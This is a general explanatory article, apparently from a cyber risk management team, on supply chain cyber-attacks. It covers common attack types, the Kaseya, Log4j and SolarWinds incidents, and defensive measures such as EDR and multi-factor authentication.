Author: Johnty Mongan
Cybercriminals target supply chains to reach as many victims as possible in a single hit. As supply chains can be large and complex, it can be difficult to know if you have sufficient protection in place. An increasing number of organisations are suffering cyber-attacks via their supply chains or via their providers of IT services. This is largely because attackers are able to take advantage of customers’ trust in their suppliers and exploit digital vulnerabilities.
What is a supply chain cyber-attack?
A supply chain cyber-attack occurs when threat actors access a company’s network via suppliers or a third-party provider (the ‘digital supply chain’). Because the third party has been given the permissions to use areas of the company’s network, applications or sensitive data, an attacker can gain access to these areas too if they are able to penetrate the third party’s defences. The distribution of malware (malicious software) is a common result of a supply chain attack.
Why are cyber-attacks on supply chains becoming more common?
The role of managed service providers (MSPs) in providing IT services such as security monitoring and digital billing makes them attractive targets for cybercriminals. Cyber-attacks on supply chains are becoming more common as they enable threat actors to target larger numbers of victims all at once, i.e., an attack on one business may give access to hundreds—or even thousands—of their customers, having a more widely-propagated impact.
Types of supply chain cyber-attacks
Hackers may attack a software company’s system, target an application’s source code and insert their own malicious code into the software. Any company that goes on to use this software would be a potential target because the product has been compromised.
This type of attack can happen through compromised physical devices, such as USB drives. The hacker can get to work when the device installs an application to allow access to the network. Once in, they will target a network device to infiltrate supply chain systems and cause widespread damage.
Firmware attacks target a computer’s booting code. When this malware has been surreptitiously loaded into a computer, the malicious code is executed as soon as the computer boots up, jeopardising the entire system or network.
Malware preinstalled on devices
Hackers can put malware on phones, USB drives, cameras, and other mobile devices. When the device is connected to a system or network, malicious code is introduced with the ability to take over devices and download apps in the background. Manufacturers of budget devices who rely on third-party software can be particularly susceptible to this type of attack.
Certificates are used to vouch for the legitimacy or safety of a company’s product. If a hacker steals a certificate, they can peddle malicious code under the guise of that company’s certificate.
By attacking the core script of a website template of a creative or digital agency that builds websites for their clients, cybercriminals can target these end clients and compromise their websites.
Watering hole attacks
This type of attack works by identifying a website that is frequented by users within a targeted organisation or sector. That website is then compromised to enable the distribution of malware. Typically, the malware delivered will be a Remote Access Trojan (RAT), enabling the attacker to gain remote access to the target’s system.
Examples of major supply chain cyber-attacks
Kaseya ransomware attack, 2021
Network management software firm, Kaseya, was the target of a ransomware gang who was able to breach the company’s remote monitoring and management package, Virtual Administration Assistant (VSA), via an authentication bypass vulnerability. Within days, up to 1,500 downstream customers had been affected by the attack through downloads containing malware.
Log4j vulnerability, 2021
Apache Log4j is one of the many building blocks that are used in the creation of modern software and is used by millions of computers worldwide running online services. A vulnerability was discovered that could allow attackers to break into systems, steal passwords and logins, extract data and infect networks with malicious software.
SolarWinds hack, 2020
When attackers hacked SolarWinds, a major software company, SolarWinds unknowingly began to send out their Orion Platform software updates with hacked code. This triggered a huge supply chain incident that compromised the data, networks and systems of up to 18,000 organisations, including U.S. government agencies.
In each of these cases, a single breach, compromise or vulnerability in distributed code led to thousands of victims—an easy win for cybercriminals.
How to strengthen your digital supply chain
It is important for organisations to work with their suppliers to identify potential supply chain risks and ensure appropriate cybersecurity measures are in place, and all suppliers should be incorporated into your organisation’s security verification.
Endpoint Detection and Response (EDR) can play a vital role in protecting your organisation from supply chain attacks as it continuously monitors endpoint activity to let you know when an attack has occurred, its attack path and the actions it took. An integrated approach to cybersecurity—combining key EDR with anti-virus software and Multi-Factor Authentication (MFA)—can further strengthen your defences.
For specialist advice regarding your potential supply chain vulnerabilities or any other aspect of your organisation’s cyber risk, please get in touch with the Cyber Risk Management team.